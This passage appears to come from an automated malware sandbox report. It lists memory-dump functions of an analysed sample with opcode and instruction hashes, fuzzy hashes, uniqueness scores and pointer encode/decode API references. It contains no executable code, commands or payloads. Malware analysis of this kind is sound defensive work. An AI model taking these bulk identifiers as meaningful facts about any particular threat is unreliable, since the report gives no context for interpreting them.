                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b11ebdb6086659e114f67cf777a17d26d0a39f420a8c12dd933e5e12a8009164
                                          • Instruction ID: e86e60dd98f07438195f003d9691c66142c26bdcc1aa35033704d78cbf154ee3
                                          • Opcode Fuzzy Hash: b11ebdb6086659e114f67cf777a17d26d0a39f420a8c12dd933e5e12a8009164
                                          • Instruction Fuzzy Hash: 92F02035B0821A8F8701CBACDC904EABBB6DB8910470040A7E409CB242E632DD02C350
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2B030, Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e850ded797b23190d81c334069d4e4a6374dc8a9838195b7db025da300bf607
                                          • Instruction ID: d49583ad8e3e7be3bd2ebba02ff91fdef9b0c365f02c51d71978d6b6354ec2c3
                                          • Opcode Fuzzy Hash: 2e850ded797b23190d81c334069d4e4a6374dc8a9838195b7db025da300bf607
                                          • Instruction Fuzzy Hash: 46F09030E4C12EDF9781FFBD9A444ADBBF5BB88208F10846AC959E7210EA714B418761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A29510, Relevance: .0, Instructions: 33COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3fa0922da7a6020c76eb8c0ab15227416f946bafe836d631209db278218e18d8
                                          • Instruction ID: 1691ffe124e854bb7fcc6f9322ffde020f9ac4c3d2162ef1db90e996832d030f
                                          • Opcode Fuzzy Hash: 3fa0922da7a6020c76eb8c0ab15227416f946bafe836d631209db278218e18d8
                                          • Instruction Fuzzy Hash: 24F09670F4011AEF9B84FFBED54146EB7F9AB44601F1085A5D506D7200EA308B048741
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A210F2, Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c441ae66699b686a87a36628d2628719757866f70c19aa65086842a1a8c2af9
                                          • Instruction ID: 2d5e98fc8ff4b48c81947ec91d29dddf39444ae2e80b7aa490617945db581c26
                                          • Opcode Fuzzy Hash: 7c441ae66699b686a87a36628d2628719757866f70c19aa65086842a1a8c2af9
                                          • Instruction Fuzzy Hash: 2EF04F78B001168FCB44EFA8C484A6FB7F3FB88200B158450D61AAB305DB30ED468BA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2D180, Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4ed0aa9007738d921a8e921a922a2fa19c55aa791f5ea3548cfbf24c4daf7607
                                          • Instruction ID: f840a0e8af50d6b3e26b55ca76c7ae584cc813d91f5da119e2d3569dfd4c0a71
                                          • Opcode Fuzzy Hash: 4ed0aa9007738d921a8e921a922a2fa19c55aa791f5ea3548cfbf24c4daf7607
                                          • Instruction Fuzzy Hash: 1EF0E5313482559BE354B65EEC44A6BB7ADEFC8760F044437E906C7B01DA219C82C6B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A201C7, Relevance: .0, Instructions: 30COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe1c5ffd9262e305777a7ad3946c606ff01aa3efd3bbcf063503e40278e92e63
                                          • Instruction ID: 5d999ef2fdf879afa1d0a8174fca37bdee04227b3f4715b44557a645a4fd2e51
                                          • Opcode Fuzzy Hash: fe1c5ffd9262e305777a7ad3946c606ff01aa3efd3bbcf063503e40278e92e63
                                          • Instruction Fuzzy Hash: 9BF054318147499EC701AF78CC54496B7B4EE82200B04C68FE8886B122EB31E5D5C7C1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2D1F8, Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d53b8c0d17eff5f25414281ef7ae162f00b951bd526c5da4dcd420580c08e107
                                          • Instruction ID: 7cf330fedf7027377bc40c1b32fcc86029fae68ed87a24efa60b8b8e8f1205bb
                                          • Opcode Fuzzy Hash: d53b8c0d17eff5f25414281ef7ae162f00b951bd526c5da4dcd420580c08e107
                                          • Instruction Fuzzy Hash: BBE0D1307541514BDB14377CB40813D76E6DBC5311B040476E40BC3306CE75CC4207E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A23CC7, Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7ae051949e26ddc8bf870a2275450c3b44eb4fc62bf36fa397e9686e935c0702
                                          • Instruction ID: b100a8dd708d19d14ea699b57ac74b760637f5ab7ef4b93f10ee426c2bf9ea9e
                                          • Opcode Fuzzy Hash: 7ae051949e26ddc8bf870a2275450c3b44eb4fc62bf36fa397e9686e935c0702
                                          • Instruction Fuzzy Hash: C4E04F31405789AEC702EB78C8604D5BB70AE86210B15C6CBE4889F126DB319997D751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A201D8, Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ee6851ead1fdc8dad0be9c150eddd067884f8928b7a072780bb6566b4cf16e93
                                          • Instruction ID: 5bb5fb2cdb09a58b9bae0faf9ec0f84186e2b605b1f614a1be50ece66cdd88c0
                                          • Opcode Fuzzy Hash: ee6851ead1fdc8dad0be9c150eddd067884f8928b7a072780bb6566b4cf16e93
                                          • Instruction Fuzzy Hash: 74E0E531814B0989C700FFA8C8518A9F7B4EF95200F00C78EE8886B222FB31E6D1CA81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2BEF8, Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0fe6e3aea478687c158d19a34a902664cc9df0a88a38a6ac68c528960ef1b384
                                          • Instruction ID: 29f6224dccce5c91cfde4dbcf6ef2d8eab8ae5265d8597ad401a6bfe491303de
                                          • Opcode Fuzzy Hash: 0fe6e3aea478687c158d19a34a902664cc9df0a88a38a6ac68c528960ef1b384
                                          • Instruction Fuzzy Hash: 44D06236100119BF9B05DE84DC41CA67B6AEB89660714C05AFD1547211C673DD22DBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2BB88, Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ab869af69afa5e3705abfa003fbeb05737d94153e11a484e1e7a4c73e3e153c
                                          • Instruction ID: d8e6f52d84d0e9a7535ad6c92223e7db018a165c074aefbb2bfd7201b7f166f6
                                          • Opcode Fuzzy Hash: 8ab869af69afa5e3705abfa003fbeb05737d94153e11a484e1e7a4c73e3e153c
                                          • Instruction Fuzzy Hash: D3D05E322001187F8B00CE88DC00CA67BADEB89220B04C05AFD5887241CAB2ED22DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2BF30, Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba01581c03808e468092beec589ea3637773bb26e09e5bdcadd80fbff0410ca9
                                          • Instruction ID: 6bfbf7b009c69bdbbe0e1e7827a9661511b906b9f1d0d10e6ea3a26561504ac0
                                          • Opcode Fuzzy Hash: ba01581c03808e468092beec589ea3637773bb26e09e5bdcadd80fbff0410ca9
                                          • Instruction Fuzzy Hash: 56D05E3D198296CBF3983768EA18B3633355F80308B004021AA0FC5291CE24C4824AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A29878, Relevance: .0, Instructions: 15COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 62f0c1791d879eb8a8472681a4e3ca1bd246a964df4c41af8e11cea5108f70d0
                                          • Instruction ID: 174ba30092597fb99cda42971d637a9e2dc98e8a665730810487f2118780f053
                                          • Opcode Fuzzy Hash: 62f0c1791d879eb8a8472681a4e3ca1bd246a964df4c41af8e11cea5108f70d0
                                          • Instruction Fuzzy Hash: BAD05E71C0410CFF4740DFE4C90089ABBB9FB44100B0004A6D506D3210EA310E005BE2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A28D88, Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                          • Instruction ID: 399b19409b12bfee8db974d66aa2a96c1138129ff0f8d3e3c5f1b8eb92e7f6bb
                                          • Opcode Fuzzy Hash: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                          • Instruction Fuzzy Hash: A2D012352001187F9704DA88D841CA6F76DEBC9670714C05BFC0887301CAB3ED12C7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2B9E8, Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                          • Instruction ID: 399b19409b12bfee8db974d66aa2a96c1138129ff0f8d3e3c5f1b8eb92e7f6bb
                                          • Opcode Fuzzy Hash: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
                                          • Instruction Fuzzy Hash: A2D012352001187F9704DA88D841CA6F76DEBC9670714C05BFC0887301CAB3ED12C7D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A23CD8, Relevance: .0, Instructions: 13COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9bca63931b5bf0adde1ee8df195e553df1f3245bb20d22b6bba6029b4999f081
                                          • Instruction ID: 4565025f28fc256174af24ade86436c76d028fc1cae6a8f12a4bec0419c52476
                                          • Opcode Fuzzy Hash: 9bca63931b5bf0adde1ee8df195e553df1f3245bb20d22b6bba6029b4999f081
                                          • Instruction Fuzzy Hash: CAD09E314147099AC700FBA8D851855F7B8EFD5210B14C65EE84D5B222EB71E691D681
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A244B0, Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                          • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                          • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                          • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A27C98, Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                          • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                          • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                          • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2B770, Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                          • Instruction ID: 89f7625bcd3042e5662e2b0f59687678129b36ffb3fe7dec0c562e4284fda470
                                          • Opcode Fuzzy Hash: 2f9c937b705b733c9644217cffe37b903ab6a11d94893328ab2d7921f8117b8c
                                          • Instruction Fuzzy Hash: 05C04C753042085F9344DA9DD851C26F7E9DBD8614714C06DA90DC7351EA72FD13C694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A281F0, Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                          • Instruction ID: 6946c9798f7289baa91495e0fb5539b78174b0423724991b48b9fdfa7c9b4558
                                          • Opcode Fuzzy Hash: b07eb51126463de2bf8462432d69fd4c92e1a2acd6486d465ab4ae050f38ce89
                                          • Instruction Fuzzy Hash: 02B012302081084F8244D6D8E841C14F39DDBC4618354C0ADE80CCB302CF33FC0385C4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2B0A0, Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 27ad63f00a3a2d9a453b48223f19ffa4b1127b1c41d05d38125c934c887fa9de
                                          • Instruction ID: ae34deb4e9fad53db57c3c60c2abf9e00f6cc00f88565bb7a077a8147ce6984c
                                          • Opcode Fuzzy Hash: 27ad63f00a3a2d9a453b48223f19ffa4b1127b1c41d05d38125c934c887fa9de
                                          • Instruction Fuzzy Hash: 2D90023108870C8B465067957D0AA55775CA5945257840051AA0E816115A55645149A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A27AF0, Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea9a6329a4afbc4850a9d69db594a64415aa3a8ca5e0dca647fbd45f05acf6d9
                                          • Instruction ID: f3937900a8b616b83bce0c8d5a911e508abac7cea96c5f10a601cfa92c508d17
                                          • Opcode Fuzzy Hash: ea9a6329a4afbc4850a9d69db594a64415aa3a8ca5e0dca647fbd45f05acf6d9
                                          • Instruction Fuzzy Hash: 0D90023609664D9B45402BD57409595775D974452B7800451A60D416015A66685046D9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A28850, Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: afdbe907cfb88b5170a51a7c4405bc4668df48c6aed9c779bf34806a3367407c
                                          • Instruction ID: 0b83560a93d3604b6c0b2c3541cb0ad86d4376034c292dd630b3d8804a554255
                                          • Opcode Fuzzy Hash: afdbe907cfb88b5170a51a7c4405bc4668df48c6aed9c779bf34806a3367407c
                                          • Instruction Fuzzy Hash: C9900231054B1C8B554027E57409755B76DD5485157804051A65D455025BAE65104595
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2ABC0, Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c3e4dcd590ea20390d528da2efac29ab57dafad47cc211f62bf0721097abb56d
                                          • Instruction ID: 64ebcf2211f19fed4ea0cb2b9c68c63da70df53d5188d778137252a68d193ed7
                                          • Opcode Fuzzy Hash: c3e4dcd590ea20390d528da2efac29ab57dafad47cc211f62bf0721097abb56d
                                          • Instruction Fuzzy Hash: 7890223800020C8B80002B80300C282330CA0000223800000A30C002000E0028000080
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 06A2BFC0, Relevance: .0, Instructions: 5COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.889114918.0000000006A20000.00000040.00000001.sdmp, Offset: 06A20000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f10371bfe39c42f002eb7644e5ab12472118506fd7d0105c59e7f4ee65323c3
                                          • Instruction ID: 951cd08d49115eddacc420b45bb4c1bfc495a5bf0f157747d0d0cbd951a2d065
                                          • Opcode Fuzzy Hash: 4f10371bfe39c42f002eb7644e5ab12472118506fd7d0105c59e7f4ee65323c3
                                          • Instruction Fuzzy Hash: 1A90223000030C8F0A0023C03808000B30C80000003800080B80C802020A20200008A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 011DF550, Relevance: 10.6, APIs: 7, Instructions: 146COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlDecodePointer.NTDLL ref: 011DF5AC
                                          • RtlDecodePointer.NTDLL ref: 011DF5EB
                                          • RtlEncodePointer.NTDLL(00000000), ref: 011DF652
                                          • RtlDecodePointer.NTDLL(00000000), ref: 011DF68E
                                          • RtlEncodePointer.NTDLL(00000000), ref: 011DF6C8
                                          • RtlDecodePointer.NTDLL ref: 011DF708
                                          • RtlDecodePointer.NTDLL ref: 011DF746
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.884248740.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: false
                                          Similarity
                                          • API ID: Pointer$Decode$Encode
                                          • String ID:
                                          • API String ID: 1638560559-0
                                          • Opcode ID: 4e42011d3b21e4ca909a2a5382650e819575557e475990fe8d2355adbcb8d340
                                          • Instruction ID: 58c7139e7f51872a2ad04d7e65f7341653ac4d698e9477c32dc87490fe2e6973
                                          • Opcode Fuzzy Hash: 4e42011d3b21e4ca909a2a5382650e819575557e475990fe8d2355adbcb8d340
                                          • Instruction Fuzzy Hash: 7E6119B480074ACFDF14CFA9D5483DEBBF0EB09318F148519D56AB6690C379568ACFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011DF25C, Relevance: 9.1, APIs: 6, Instructions: 131COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlDecodePointer.NTDLL ref: 011DF284
                                          • RtlEncodePointer.NTDLL(00000000), ref: 011DF2EF
                                          • RtlDecodePointer.NTDLL(-000000FC), ref: 011DF339
                                          • RtlEncodePointer.NTDLL(00000000), ref: 011DF379
                                          • RtlDecodePointer.NTDLL ref: 011DF3BF
                                          • RtlDecodePointer.NTDLL ref: 011DF403
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.884248740.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: false
                                          Similarity
                                          • API ID: Pointer$Decode$Encode
                                          • String ID:
                                          • API String ID: 1638560559-0
                                          • Opcode ID: 4e010ee7c5a4d4fb395a9eea8dbffb23dd0b371ef5d04540da7f2e1af7541961
                                          • Instruction ID: 4ed2b43e856b66e073ecef70914a3b8a10e8711035b8f6b4b554fd9aa6dc0076
                                          • Opcode Fuzzy Hash: 4e010ee7c5a4d4fb395a9eea8dbffb23dd0b371ef5d04540da7f2e1af7541961
                                          • Instruction Fuzzy Hash: C351FA74C05249DFDB14CFA8E1987DCBBF1AB08318F28844AE515BB291C7B5498ACFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011DF710, Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlEncodePointer.NTDLL(00000000), ref: 011DF652
                                          • RtlDecodePointer.NTDLL(00000000), ref: 011DF68E
                                          • RtlEncodePointer.NTDLL(00000000), ref: 011DF6C8
                                          • RtlDecodePointer.NTDLL ref: 011DF708
                                          • RtlDecodePointer.NTDLL ref: 011DF746
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.884248740.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: false
                                          Similarity
                                          • API ID: Pointer$Decode$Encode
                                          • String ID:
                                          • API String ID: 1638560559-0
                                          • Opcode ID: 4f88e2d21bced499a263848febeb2c9eaa1acf8e94f461274fa62c90b662d53b
                                          • Instruction ID: 8209a62b83e932628b34c910993f44c2ee895634311278f2c4391fdfca207389
                                          • Opcode Fuzzy Hash: 4f88e2d21bced499a263848febeb2c9eaa1acf8e94f461274fa62c90b662d53b
                                          • Instruction Fuzzy Hash: 77413EB4801786CEDF54CFA9C58C3DEBFF0AB09308F148419D156BA690C379468ACFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%